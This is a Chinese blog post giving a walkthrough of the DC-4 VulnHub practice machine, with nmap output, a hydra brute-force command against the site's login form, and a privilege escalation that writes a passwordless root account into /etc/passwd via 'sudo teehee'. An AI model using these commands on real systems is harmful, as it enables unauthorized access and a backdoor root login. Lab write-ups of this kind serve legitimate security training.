DC-4:

已于 2022-01-19 12:00:01 修改
阅读量5.1k 收藏 1
点赞数 4
分类专栏: 靶机 文章标签: 安全
于 2022-01-19 11:59:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58380360/article/details/122576514
版权

文章目录

环境配置

攻击机:Kali
IP:192.138.247.129
靶机:DC-4
IP:192.168.247.135

信息收集

nmap扫描一下

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 22:09 EST
Nmap scan report for 192.168.247.135
Host is up (0.00088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:D9:BB:04 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 192.168.247.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds

发现开发的是22,80端口
在这里插入图片描述

漏洞利用

利用九头蛇,爆一下

输入:hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.247.135
http-post-form “/login.php:username=USER&password=PASS:S=logout”
-F

在这里插入图片描述

登入

在这里插入图片描述
这个时候可以利用反弹shell

在这里插入图片描述
在这里插入图片描述
监听成功
在jim目录中发现一个文本,感觉是可以利用ssh,爆破进入
在这里插入图片描述
成功进入

权力提升

在这里插入图片描述

找到了密码,因为jim什么sudo权限都没有,所以我们要找到其他用户的sudo权限,来进行判断
在这里插入图片描述
发现这个地方有一个权限是关于teehee的
利用-a

输入:echo “hacker::0:0:::/bin/bash” | sudo teehee -a /etc/passwd

就是把一个没有密码的用户hacker,并且是这个用户具有root权限,再登入到这个用户的时侯,就转换成为root用户
在这里插入图片描述
成功

总结

1)九头蛇利用
2)ssh连接
3)teehee提升权力

正如树枝和树干连接在一起那样,脱离树干的树枝很快就会枯死。——奥涅格

不见星光见月光
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-4靶机练习
千寻的博客
01-02 3072
DC-4靶机练习 第一步 扫描主机 [nmap -sP 192.168.139.0/24] 第二步 扫描端口 [nmap -A 192.168.139.147 -p 1-65535] 第三步 访问80网页 第四步 尝试使用burp获取账号和密码 Kali的浏览器中安装插件 proxy switch 打开burpon 打开抓包 [cat /usr/share/john/password.l...
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2447
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
python文件读不出来-python文件读取失败怎么处理
weixin_39642761的博客
11-11 927
在读取文件时候比如读取 xxx.csv 时候 可能报编码错误类似于"xxx" codec can"t decode byte 0xac in position 211: illegal multibyte sequenid_list = []with open("E:/work_spider/xxx/xx.csv", "r", ...
DC-4渗透笔记SUDO -l
qq_74157343的博客
04-07 1687
在sudo -l 之后看到一个teehee, 在这里我们用teehee -a这条命令来向/etc/passwd中写入一个账户密码,且该用户是拥有root权限的,之后只需要切换到我们刚创建的用户下就可以完成提权了。同时,在这里解释一下teehee: teehee 并不是一个标准的 Linux 命令,它可能是一个自定义的脚本或者别名,或者仅仅是一个开发者用来逗趣的玩笑。小结:中间拿到shell 在目录中查看文件还是挺麻烦的,也比较枯燥,可以下来再多进去逛逛,且这次的提权方法也比较少见,之后再用其他方法试试。
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4082
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
Ubuntu20.04手动安装binutils objdump、arm-linux-objdump: command not found、bash: hello.s: Permission denie
GRT609的博客
03-25 5049
Ubuntu20.04手动安装binutils objdump、arm-linux-objdump: command not found、bash: hello.s: Permission denied
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3858
DC-4靶机渗透测试详细教程
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2970
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4474
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
dc-vue:基于VueCli4.xx和DC-SDK构建的三维应用脚手架,用于开发三维WebGis项目
02-14
"dc-vue"是一个专为开发三维WebGIS项目的脚手架,它基于Vue CLI 4.x版本,并集成了DC-SDK。这个框架的目的是简化和加速开发者构建WebGIS应用程序的过程,使得用户能够更加高效地创建复杂的3D地理信息系统。 Vue CLI...
driver-4q-dc-motor:4Q直流电机驱动器
02-14
Projeto驱动程序4Q 2020/1 Especificação Acionamento do motor Abrangência FontePrimária(220Vac) Trafo + Retificador + Filtro Capacitivo(ou fonte chaveada) Circuito Modulador PWM(escolher C...
DC-Resources:ignoooooooooreeeee说
05-20
4. **Java库和框架**:如果DC-Resources涉及到了具体的Java库或框架,例如Spring Boot、Hibernate、MyBatis等,这些都是Java开发中的常用工具,可以大大简化开发工作。 5. **单元测试**:Java项目通常会包含JUnit或...
dc-server:HTTP服务器
05-08
4. **中间件支持**:中间件是Node.js服务器端编程的一个强大特性,"dc-server"可能内置或支持第三方中间件,用于日志记录、会话管理、错误处理等。 5. **静态文件服务**:HTTP服务器通常需要提供静态文件服务,例如...
PCS-dc-dc-DSP:TMS320F28379D中的DCDC控制器DSP代码
02-18
标题 "PCS-dc-dc-DSP:TMS320F28379D中的DCDC控制器DSP代码" 指的是一个基于TMS320F28379D数字信号处理器(DSP)的直流-直流(DC-DC)控制器的设计与实现。这个控制器的代码可能是用C语言编写的,因为标签中提到了"C...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1152
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
chromedriver-mac-x64_122.0.6217.0.zip
最新发布
07-31
chromedriver-mac-x64_122.0.6217.0.zip
多元宇宙算法优化长短记忆网络MVO-LSTM故障诊断分类【含Matlab源码 6074期】.zip
07-31
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化LSTM分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化LSTM 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化LSTM 4.4.3 灰狼算法GWO/狼群算法WPA优化LSTM 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化LSTM 4.4.5 萤火虫算法FA/差分算法DE优化LSTM 4.4.6 其他优化算法优化LSTM
全国大学生电子设计竞赛(电赛)相关资源(流程、模板、心得、历届资料等).docx
07-31
全国大学生电子设计竞赛(简称电赛)是一项旨在促进大学生电子设计能力提升和创新能力培养的全国性学科竞赛。以下是对电赛相关资源(流程、模板、心得、历届资料等)的详细概述: 一、竞赛流程 全国大学生电子设计竞赛的流程通常包括以下几个关键步骤: 报名与组队:参赛学生需按照学校或赛区的规定时间进行报名,并组成三人一队的小组。报名时需确定参赛的组别(如本科生组或高职高专学生组)。 培训与准备:参赛队伍在比赛前需进行充分的准备,包括学习相关电子设计知识、掌握必要的软硬件技能、熟悉竞赛规则等。学校或赛区可能会组织培训课程、模拟竞赛等活动帮助参赛队伍提升能力。 竞赛开始:竞赛通常在单数年的8月份举行,为期四天三夜。竞赛当天公布题目,参赛队伍需在规定时间内完成作品设计、制作及报告撰写。 作品提交与评审:竞赛结束后,参赛队伍需将作品及报告提交给赛区组委会进行评审。评审工作包括初评和复评两个阶段,最终评选出获奖队伍。 二、竞赛模板 在电赛中,参赛队伍需要提交的作品报告通常需要遵循一定的模板格式。以下是一个简化的作品报告模板示例: 封面:包括作品名称、参赛队伍信息(队伍名称、成员姓名、学校名称等)、竞赛日
CIPA DC-007:MPO多图格式标准详解
该标准于2009年2月4日发布,由CIPA标准化委员会编制。同时,文档提供‘按原样’的方式,不提供任何形式的保证,包括但不限于默示的适销性、特定用途的适用性或非侵权保证。对于因使用此文档或其内容而产生的任何损害...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值